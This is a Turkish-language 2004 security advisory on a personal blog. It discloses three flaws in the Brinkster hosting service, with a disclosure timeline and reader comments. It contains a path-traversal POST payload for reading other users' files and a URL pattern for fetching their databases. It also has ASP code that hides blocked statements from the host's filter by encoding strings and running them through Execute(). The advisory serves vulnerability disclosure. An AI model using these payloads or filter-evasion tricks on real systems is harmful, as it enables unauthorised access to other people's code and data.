Brinkster Güvenlik Açıkları - Türkçe

09.02.2004

Okuyucu : 18.570
Günlük Okuyucu : 11,4
- ------------------------------------------------------
BRINKSTER GÜVENLİK AÇIKLARI - TÜRKÇE
- ------------------------------------------------------
For English : http://ferruh.mavituna.com/article/?435
Online Adres : http://ferruh.mavituna.com/article/?437

1. Diğer kullanıcıların kaynak koduna ulaşma
Şiddet: Yüksek

2. Diğer Kullanıcıların Veritabanı Dosyalarına Ulaşma
Şiddet: Orta

3. Brinkster Kod Kontollerini Geçme
Şiddet: Orta


- ------------------------------------------------------
BRINKSTER HAKKINDA
- ------------------------------------------------------
Brinkster ücretsiz ve ücretli şekilde hosting hizmeti sağlayan popüler bir web hosting firmasıdır.
www.brinskter.com

- ------------------------------------------------------
AÇIK DURUMU;
- ------------------------------------------------------
(1/26/2004) tarihi itibarı ile halen Brinskter.com açıktır;

- ------------------------------------------------------
1.DİĞER KULLANINILARIN KODLARINA ULAŞMA
- ------------------------------------------------------
Herhangi bir geçerli kullanıcı diğer Brinkster kullanıcılarının kodlarına ulaşabilir. Bunun için ilgili kullanıcı adını ve dosyanın adını bilmesi yeterlidir. Dolayısıyla bir saldırgan diğer brinkster üyelerinin dosyalarının kaynak kodlarını, şifrelerini ve herhangi bir dosyalarının içeriğini görebilir. .asp, .aspx vs. tarzı Serverda işlenen dosyalar olsa bile.


Bu sorun Brinkster' in Dosya yönetim programı ile ilgilidir (http://www.brinkster.com/FileManager.asp). 
Dosya Değiştirme sayfası (http://www.brinkster.com/FileManagerEdit.asp) saldıragnın diğer POST verilerini modifiye ederek diğer kullanıcılarının kaynak kodlarını görmesine izin verir.

	------------------------------------------------------
	URL	: http://www.brinkster.com/FileManagerEdit.asp
	POST	: faction=editfile&file2edit=%5C..%5C[KURBAN KULLANICI ADI]%5C[OKUNACAK DOSYANIN ADI]
	------------------------------------------------------

- ------------------------------------------------------
2. VERİTABANLARINA ERİŞİM
- ------------------------------------------------------
Eğer bir Brinkster kullanıcısının veritabanı dosyasının adını biliyorsanız basit şekilde web üzerinden bu dosyayı download edebilirsiniz. Bu ismi ilk açıktaki yöntemle basitçe bulabilirsiniz.


	------------------------------------------------------
	Veritabanı Adresi;
	http://[BrinksterServer].brinkster.com/[Kullanıcıadı]/db/[Veritabanıadı]
	------------------------------------------------------


- ------------------------------------------------------
3. Kod Kontrollerini Geçme
- ------------------------------------------------------
Brinkster ASP dosyalarında bazı kodlara izin vermez. Örnek olarak "Server.Scripttimeout = 8000" kodunu ücretsiz bir Brinkster üyesi kullanamaz. Dosya Yöneticisi otomatik olarka bu kodları tanı r ve o dosyaları henüz upload ederken iptal eder.

Bu kontrol ASP' nin hazır fonksiyonu olan Execute() ile veya bazı sintaks numaraları ile geçilebilir. Bir stringi basit bir şekilde encode ve decode ederek execute() aracılığı ile çalıştırabilirsiniz.

	------------------------------------------------------
	Örnek Kodlar - İspat;
	------------------------------------------------------	
	1) Simple Method without Execute();
	<%
	 On _
	 Error Resume Next
	%>

	2) Another Method with Execute();
	<%
	Dim onErrorStr
	onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s u m e-N e x t"
	Execute(Replace(Replace(onErrorStr," ",""),"-"," "))
	%>


	3) Another one with a Ascii values and Execute();
	This code allows you set "Server.Scripttimeout";
	<%
	Dim converted
	Const errStr =
"083101114118101114046083099114105112116084105109101111117116032061032
057048048048048048048048048 "
		converted = Asc2Str(errStr)
		Execute(converted)

		Response.Write converted	

		Function Asc2Str(byVal text)
			Dim converted, character, i
			For i = 0 to Round((Len(text)-1)/3,0)
				If Len(text) > 2 Then
					character = Chr(Left(text,3))
					converted = converted & character
					text = Right(text,Len(text)-3)
				End If
			Next

			Asc2Str = converted
		End Function
	%>
	------------------------------------------------------
	// -- 
	------------------------------------------------------



- ------------------------------------------------------
HISTORY;
- ------------------------------------------------------
01.01.2004 - Keşfedildi
01.18.2004 - Brinkster Bilgilendirildi
02.08.2004 - Yayınlandı
02.09.2004 - Türkçe Doküman Yayınlandı

- ------------------------------------------------------
Vendor Status;
- ------------------------------------------------------
2 defa tüm detaylar ile iletişim kurulmasına rağmen hiç cevap alınamadı


Ferruh Mavituna
Web Uygulaması Güvenlik Uzmanı
http://ferruh.mavituna.com

Yorumlar

RSS Bu makalenin yorumlarını RSS ile takip et!

Üstelik eklemek isterimki istediğiniz sitenin adını elde etmek için googlede aratmaktan ziyade input'u boş bırakıp onayladıktan sonra (server aşırı yüklenmekten hata vermediği sürece) bir süre bekleyip 28. server üzerindeki bütün üye sitelerin isim listesini elde edebiliyoruz.Yani google gibi bir arama motorunda kayıtlı olması şart değil.A dan Z ye bütün dünya üzerindeki sitelerin isimleri biraz sabır gösterip bekledikten sonra avucunuzun içinde diyebilirim.Ama sakın kötü niyetle kullanılmaması gerektiğini tam aksine ibret mahiyetinde görmeniz gerektiğini önemle arz ediyorum..

Saygılarımla..

Özkan Çeşim [ # | 24.07.2004 ]

Epeydir bakmıyordum.Brinkster yeni dosya yöneticisi yapmış nerden çaldıkları belli değil ama eminimki ondada bir sürü açık vardır.


Brinksterda böyle bir açık olduğunu bir iki ay önce aynı makaleyi ferruh abinin izniyle bi foruma koymuşlardı ordan öğrenmiştim üzerinde durmadım fazla...başımı ağrıtmadan hemen brinksterdaki kendi dosyalarımın hepsini tozla buz ettim...

Eskiden iyi bir geçmişi olmayan firmanın revize edilmiş logosu vs...leri değiştirilmiş hali olan bir firmadan ne beklenebilir.Ayıp bari insan önceki dosya yöneticisini kapatır.Bir de menüye onuda eklemişler...

arda önsal [ # | 07.09.2004 ]

benim sorum şu; mail atıp beni sürekli rahatsız eden biri var. mail adresi......@superposta.com.mali bana gönderen kullanıcının ip adresini nasıl bulabilirim.
teşekkürler

mikail aslan [ # | 24.09.2004 ]

Dün brinksterde yapmış olduğum site bir arkadaş tarafından hacklendi amacını anlamadım kendince bir takım kurmuş ve bişeyler ispatlamaya çalışıyor galiba , site içeriğini gösteren web sitesinin ziyaretçiler adı altında log tuttuğunu farkettim be giriş yapıp baktım saolsun arkadaşlar baya yardımcı olmuşlar sanırım ayın 4 ünde bir gözatılmış siteme. Şimdi nasıl geri alabileceğim konusunda fikri olan var mı?

www28.brinkster.com/fenforum

Sözer [ # | 07.12.2004 ]

harika bir kitap .sürükleyici .muazzam bir hikaye .insan hayatında iz bırakabilecek bi r kitap.mutlaka okunmalı........

mehmet yapıcı [ # | 05.01.2005 ]

kardeş bu brinksteri hackleme yönetim geçmişte kaldı. şu an sistemi yenilediler.

Mehmet SALKIM [ # | 03.03.2005 ]

ben gürkan ne olur bana yardım edin ben 13 yaşın dayım benim msn ne mi kırıyolar bana yardım edin ne olur birde benim msn ne çalışmıyo
ne olur allah için ne olur
bekliyorum ne olur abilerim

gürkanipekel [ # | 09.06.2005 ]

kardesler ip adresini kolay yoldan bulmak için 1 yöntem söyleyeyim size:)yapmanız gerekenler:
başlat/çalıştır ve sonra cıkan cmd ye tamam deyip cıkan karanlık sayfaya netstat -n yazmak !! sonra krasına ip adresleri çıka
örnek:
Etkin Bağlantılar

İl.Kr. Yerel Adres Yabancı Adres Durum
TCP 10.0.0.47:1157 207.46.2.30:1863 ESTABLISHED
TCP 10.0.0.47:1167 65.54.195.188:80 CLOSE_WAIT
TCP 10.0.0.47:1176 212.115.10.169:80 ESTABLISHED
TCP 10.0.0.47:1179 207.68.178.16:80 CLOSE_WAIT
TCP 10.0.0.47:1401 212.175.12.230:6782 ESTABLISHED
TCP 10.0.0.47:2055 209.145.252.2:80 ESTABLISHED
TCP 10.0.0.47:2057 209.145.252.2:80 ESTABLISHED
TCP 10.0.0.47:2090 216.127.78.241:80 CLOSE_WAIT
TCP 10.0.0.47:2096 66.246.220.41:80 CLOSE_WAIT
TCP 10.0.0.47:2102 66.249.93.99:80 CLOSE_WAIT

baran keso [ # | 26.10.2005 ]

ben server satın almayı düşünüyorum
sizce alim mi arkadaşlar
Brinkster

samet [ # | 26.10.2005 ]

Merheba
db klasörü altındaki veriatabanı dosyaları, veritabanı yolunu bilseniz dahi ve veritabanı -
dosyasının adını bilsenizde download edilemiyor normalde, Internet Explorer in adres
satırına veri tabanı yolunu yazınca (Örneğin http://KULLANICI_ADI.brinkster.net/db/VERİTABANI_DOSYASI_ADI.mdb
yazınca dosya dowload olmuyor. Ekrana garip bi mesaj geliyor.
db klasörü koruma altına alınmış gibi. Sadece veritabanı yolunu bilmek pek bişey ifade etmiyor.

Ama başka yollarla o veritabanı dosyasını download etmek mümkün mü o nu bilmem yada,
veritabanı dosyasını içeriğini değiştirmek gibi, başka yolla yapılırsa onu bilmem. ama normalde inmiyor.

kemal [ # | 26.12.2006 ]

tasarimi filan güzel ama brinkster hosting konusunda gerçekten çok amatör. çoklu domain destegi veren paketi aldiginiz zaman domain ekleme seçenegi kontrol panelinde yok ! domain eklemek için live chat e girmek zorundasiniz her seferinde. Allah tan parayi geri ödeme olayi var (umarim buda fos degildir :) bu saçmaligi maille bildirdim lakin düzelteceklerini sanmiyorum. . .

SW [ # | 23.03.2007 ]

db/genel.mdb db/forum.mdb bunlarin acigini neden kapiyamiyorum ben paylasim bilgisi olan varsa

ayarlar asp db baslarin 3 xxx koydum db kilosrunden db baslarin 3 xxx koydum sizce neden olmuyor?

berkalp [ # | 01.05.2007 ]

Yorum Ekle





Kullanılabilir Taglar : [<blockquote>] [<strong>] [<em>]

Diğer Yazılar

Neredeyim ?

Ferruh.Mavituna » Advisories » Brinkster Güvenlik Açıkları - Türkçe

RSS Feed site statistics RSS Subscribers
Siteyi E-mail ile Takip Et

Ferruh Mavituna
© 2002-2007, Ferruh Mavituna

Sabit IP Adresi : 81.22.99.133, SSL Erişimi, Hakkında